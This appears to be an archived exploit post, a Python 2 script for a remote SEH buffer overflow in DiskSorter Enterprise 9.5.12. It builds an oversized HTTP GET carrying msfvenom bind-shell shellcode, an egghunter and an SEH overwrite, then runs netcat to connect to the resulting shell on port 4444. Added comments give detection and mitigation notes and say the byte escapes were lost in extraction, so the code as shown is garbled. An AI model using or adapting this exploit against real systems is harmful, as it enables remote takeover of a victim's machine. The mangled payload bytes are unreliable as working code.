Disk Sorter Enterprise 9.5.12 Buffer Overflow
Posted on 22 March 2017
#!/usr/bin/env python
# Exploit Title: DiskSorter Enterprise 9.5.12 - 'GET' Remote buffer overflow (SEH)
# Date: 2017-03-22
# Exploit Author: Daniel Teixeira
# Author Homepage: www.danielteixeira.com
# Vendor Homepage: http://www.disksorter.com
# Software Link: http://www.disksorter.com/setups/disksorterent_setup_v9.5.12.exe
# Version: 9.5.12
# Tested on: Windows 7 SP1 x86
#
# NOTE(review): archived proof-of-concept listing, kept byte-identical for
# analysis.  It is Python 2 code (`print` statement, str passed to
# socket.send).  The byte-string literals below have lost their backslash
# escapes in extraction (e.g. "x90x90xEBx05"), so as rendered they are
# plain ASCII text and do not encode the bytes the author's comments
# describe; they are deliberately left as they appear on the page.
#
# What the script describes, from a defender's point of view: one
# oversized HTTP GET to port 80 whose request-target carries a 6000-byte
# blob (filler + SEH record overwrite + egghunter + tag + msfvenom
# payload + NOP padding), then a netcat connection to port 4444 on the
# same host, which matches the windows/shell_bind_tcp payload named in
# the msfvenom command below.
#   Detection: a request line of several kilobytes with non-printable
#   bytes in the URI on the product's web port; a crash/restart of the
#   service followed by a new listening socket on 4444.
#   Mitigation: vendor update (the page names 9.5.12 as the tested
#   version; it does not state a fixed version) and keeping the product's
#   web interface off untrusted networks.  SEH-overwrite techniques depend
#   on a gadget module without SafeSEH/rebasing — presumably libspp.dll
#   here, per the author's comment; confirm against the binary.

import socket,os,time,struct

host = "192.168.2.186"   # target address as given in the original post (lab value)
port = 80                # port the GET below is sent to

#Bad Chars x00x09x0ax0dx20"
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -b "x00x09x0ax0dx20" -f python
# Encoded payload as emitted by the msfvenom command above (escapes mangled
# in this rendering, see the review note at the top).
shellcode = ""
shellcode += "xd9xc0xd9x74x24xf4x5exbfxb0x9bx0exf2x33"
shellcode += "xc9xb1x53x31x7ex17x83xeexfcx03xcex88xec"
shellcode += "x07xd2x47x72xe7x2ax98x13x61xcfxa9x13x15"
shellcode += "x84x9axa3x5dxc8x16x4fx33xf8xadx3dx9cx0f"
shellcode += "x05x8bxfax3ex96xa0x3fx21x14xbbx13x81x25"
shellcode += "x74x66xc0x62x69x8bx90x3bxe5x3ex04x4fxb3"
shellcode += "x82xafx03x55x83x4cxd3x54xa2xc3x6fx0fx64"
shellcode += "xe2xbcx3bx2dxfcxa1x06xe7x77x11xfcxf6x51"
shellcode += "x6bxfdx55x9cx43x0cxa7xd9x64xefxd2x13x97"
shellcode += "x92xe4xe0xe5x48x60xf2x4ex1axd2xdex6fxcf"
shellcode += "x85x95x7cxa4xc2xf1x60x3bx06x8ax9dxb0xa9"
shellcode += "x5cx14x82x8dx78x7cx50xafxd9xd8x37xd0x39"
shellcode += "x83xe8x74x32x2exfcx04x19x27x31x25xa1xb7"
shellcode += "x5dx3exd2x85xc2x94x7cxa6x8bx32x7bxc9xa1"
shellcode += "x83x13x34x4axf4x3axf3x1exa4x54xd2x1ex2f"
shellcode += "xa4xdbxcaxdaxacx7axa5xf8x51x3cx15xbdxf9"
shellcode += "xd5x7fx32x26xc5x7fx98x4fx6ex82x23x7ex33"
shellcode += "x0bxc5xeaxdbx5dx5dx82x19xbax56x35x61xe8"
shellcode += "xcexd1x2axfaxc9xdexaax28x7ex48x21x3fxba"
shellcode += "x69x36x6axeaxfexa1xe0x7bx4dx53xf4x51x25"
shellcode += "xf0x67x3exb5x7fx94xe9xe2x28x6axe0x66xc5"
shellcode += "xd5x5ax94x14x83xa5x1cxc3x70x2bx9dx86xcd"
shellcode += "x0fx8dx5excdx0bxf9x0ex98xc5x57xe9x72xa4"
shellcode += "x01xa3x29x6exc5x32x02xb1x93x3ax4fx47x7b"
shellcode += "x8ax26x1ex84x23xafx96xfdx59x4fx58xd4xd9"
shellcode += "x7fx13x74x4bxe8xfaxedxc9x75xfdxd8x0ex80"
shellcode += "x7exe8xeex77x9ex99xebx3cx18x72x86x2dxcd"
shellcode += "x74x35x4dxc4"

#Buffer overflow
# Filler preceding the SEH record; 2487 is the offset the author reports.
junk = "A" * 2487

#JMP Short = EB 05
# Next-SEH slot: two NOPs then a short jump, per the author's comment.
nSEH = "x90x90xEBx05" #Jump short 5

#POP POP RET (libspp.dll)
# Handler address packed little-endian; the author places it in libspp.dll.
SEH = struct.pack('<L',0x10015FFE)

#Generated by mona.py v2.0, rev 568 - Immunity Debugger
# The egghunter scans for the 8-byte tag that is placed just before the payload.
egg = "w00tw00t"
egghunter = "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74"
egghunter += "xefxb8x77x30x30x74x8bxfaxafx75xeaxafx75xe7xffxe7"

#NOPS
nops = "x90"

#Payload
# Fixed total length of 6000: everything after the egg is NOP-padded so the
# request-target size is constant regardless of payload length.
payload = junk + nSEH + SEH + egghunter + nops * 10 + egg + shellcode + nops * (6000 - len(junk) - len(nSEH) - len(SEH) - len(egghunter) - 10 - len(egg) - len(shellcode))

#HTTP Request
# The whole blob rides in the request-target of a single GET.  The trailing
# " " literals presumably stood where CRLF terminators were in the original
# (lost in extraction); as shown, the request is not even well-formed HTTP.
request = "GET /" + payload + "HTTP/1.1" + " "
request += "Host: " + host + " "
request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + " "
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + " "
request += "Accept-Language: en-US,en;q=0.5" + " "
request += "Accept-Encoding: gzip, deflate" + " "
request += "Connection: keep-alive" + " "

# NOTE: rebinding `socket` shadows the imported module; it happens to be
# harmless here only because the module is never used again afterwards.
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.connect((host,port))
socket.send(request)
socket.close()

print "Waiting for shell..."
time.sleep(10)
# Connects to the listener the bind-shell payload is expected to open; this
# is the shell-command concatenation a defender would expect to see in
# process telemetry right after the crash.
os.system("nc " + host + " 4444")